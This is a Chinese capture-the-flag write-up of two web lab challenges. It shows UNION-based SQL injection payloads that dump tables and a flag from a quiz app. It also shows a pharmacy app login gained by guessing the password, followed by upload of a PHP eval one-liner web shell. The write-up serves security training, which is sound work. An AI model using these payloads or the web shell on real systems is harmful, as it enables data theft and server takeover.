春秋云镜 免费空间 部分web题目

 

Web Based Quiz System SQL注入

 

 直接输入welcome.php不行,只能注册一个用户登录进去

 登录发现是题目说的注入的url,发现url上p的参数变动是换页面,先尝试着判断注入点

发现无论是字符还是数字都没有异常的回显

再试试看点击mysql 的start

 发现有新的参数,尝试对eid进行判断

welcome.php?q=quiz&step=2&eid=60377db362694'--+&n=1&t=34%27--+

 

 有新回显说明存在注入点

'union select 1,2,3,4,5--+

'oreder by 5

 发现列数为5

开始尝试脱库

'union select 1,2,3,4,database()--+

 在第3位

'union select 1,2,database(),4,5--+

 

 接下来就是各种爆

表名

eid=-5b141b8009cf0' union select 1,2,group_concat(table_name),4,5 from%20information_schema.tables where table_schema=database()--+

字段名

eid=-5b141b8009cf0' union select 1,2,group_concat(column_name),4,5 from%20information_schema.columns where table_name='flag'--+

爆flag

eid=-5b141b8009cf0' union select 1,2,group_concat(flag),4,5 from ctf.flag--+


Pharmacy Management System shell upload

 

 一个登录界面,题目没有提示有注入所以这里应该是寻找用户邮箱和密码

整个网页只有下面有链接就点进去试试

 随便点一个查看

在弹出的浮窗里正好就有邮箱,这个容易被忽略

后面就不知道怎么找密码了,看别的博主说这个是根据邮箱地址猜的

mayuri.infospace@gmail.com

 发现社工名是密码

mayurik

 

 登录成功!

通过一开始题目的提示寻找发现文件上传点

 上传一句话shell

<?php eval($_POST['g']);

 上传成功,右键复制图像链接使用蚁剑连接

 连接成功,在主目录下发现flag


  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sharpery

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值